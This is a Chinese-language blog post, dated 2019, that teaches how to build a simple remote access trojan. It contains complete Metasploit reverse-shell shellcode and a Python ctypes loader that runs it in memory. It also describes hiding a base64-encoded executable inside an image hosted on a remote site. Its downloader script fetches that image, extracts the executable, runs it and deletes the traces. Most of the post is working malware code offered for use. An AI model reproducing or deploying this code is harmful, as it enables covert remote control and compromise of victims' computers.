一个比较捞的rat

  1. 什么是rat
  2. 思路
  3. 操作
  4. 代码

什么是rat

可以在受害者机器内安装恶意组件
以下来自百度的解释:

rat是特洛伊木马的一个变体,也成为net-hack程序。RAT是一个可以在目标计算机上安装服务器组件的恶意代码。

思路

1.msf生成shellcode
2.将shellcode base64编码藏在图片里
3.将图片放入远程站点
4.py写一个下载远程图片并匹配出base64写入exe
5.删除下载的图片

操作

msf生成的shellcode

buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41"
buf += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
buf += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
buf += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
buf += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66"
buf += b"\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b\x80"
buf += b"\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50"
buf += b"\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
buf += b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48"
buf += b"\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75"
buf += b"\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b"
buf += b"\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
buf += b"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
buf += b"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
buf += b"\x12\xe9\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f"
buf += b"\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0"
buf += b"\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0"
buf += b"\xa8\xf1\x84\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba"
buf += b"\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00"
buf += b"\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41"
buf += b"\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48"
buf += b"\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2"
buf += b"\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x85\xc0"
buf += b"\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00\x48"
buf += b"\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
buf += b"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8"
buf += b"\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
buf += b"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31"
buf += b"\xc9\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49"
buf += b"\x89\xc7\x4d\x31\xc9\x49\x89\xf0\x48\x89\xda\x48\x89"
buf += b"\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d"
buf += b"\x28\x58\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a"
buf += b"\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c\xff"
buf += b"\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4"
buf += b"\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2"
buf += b"\x56\xff\xd5"

使用py来执行shellcode

import ctypes
import sys
import chardet
from ctypes import *
import binascii

buf =  b"shellcode"



#这两个微软官方说明是可读可写可执行,PAGE_EXECUTE_READWRITE和VIRTUAL_MEM
PAGE_EXECUTE_READWRITE = 0x00000040 #参数设定
VIRTUAL_MEM = ( 0x1000 | 0x2000 ) #参数设定
buf_arr = bytearray (buf) #shellcode变为一个新的字节数组
buf_size = len(buf_arr) #计算shellcode的大小
kernel32 = ctypes.cdll.LoadLibrary("kernel32.dll") #调用kernel32.dll
kernel32.VirtualAlloc.restype = ctypes.c_uint64 #返回类型为c_uint64
sc_ptr = kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(buf_size), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) #设置
buf_ptr = (ctypes.c_char * buf_size).from_buffer(buf_arr) #将shellcode指向指针
#print(sc_ptr)
#print(buf_ptr)
kernel32.RtlMoveMemory(ctypes.c_uint64(sc_ptr),buf_ptr,ctypes.c_int(buf_size)) #调用dll,指向shellcode

handle = kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(sc_ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

将执行shellcode的py打包成exe,然后打开,对其进行base64编码
然后用HxDx64打开指定的图片,然后将
base64编码的exe写入到图片里

我的图片是

加入base64编码后的exe

加入shellcode后图片大小为7mb

注意

将其扔到远程站点,这里以phpstudy搭建为例,不要把放图床,图床会把你图片给模糊或减小你内存
shellcode就少了

代码

代码如下

#author:九世
#time:2019/4/20

import asyncio
import requests
import re
import base64
import os

async def demo():
    url = 'http://192.168.3.83/timg.jpg' #你的图片地址
    rqt=requests.get(url=url)
    with open('xxx.jpg','wb') as r:
        r.write(rqt.content)

def zx():
    dq=open('xxx.jpg','rb')
    zg=str(dq.read()).replace("b'",'').replace("'",'')
    pp=re.findall('TVq.*',zg)
    zh=base64.b64decode(pp[0])
    with open('demo.exe','wb') as w:
        w.write(zh)
    os.remove('xxx.jpg')
    os.system('demo.exe')

def pd():
    j='xxx.jpg'
    if os.path.exists(j):
        file=os.path.getsize(j)
        if file==7985376:
            zx()
        else:
            exit()

async  def main():
    thead=[]
    thead.append(asyncio.ensure_future(demo()))
    await asyncio.wait(thead)
if __name__ == '__main__':
    loop=asyncio.get_event_loop()
    loop.run_until_complete(main())
    loop.close()
    pd()

测试结果

仓库地址:

https://github.com/422926799/python/tree/master/%E7%AE%80%E5%8D%95%E7%9A%84RAT

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:一个比较捞的rat

本文作者:九世

发布时间:2019-04-20, 20:21:27

最后更新:2019-04-20, 21:12:04

原始链接:http://422926799.github.io/posts/10e14164.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录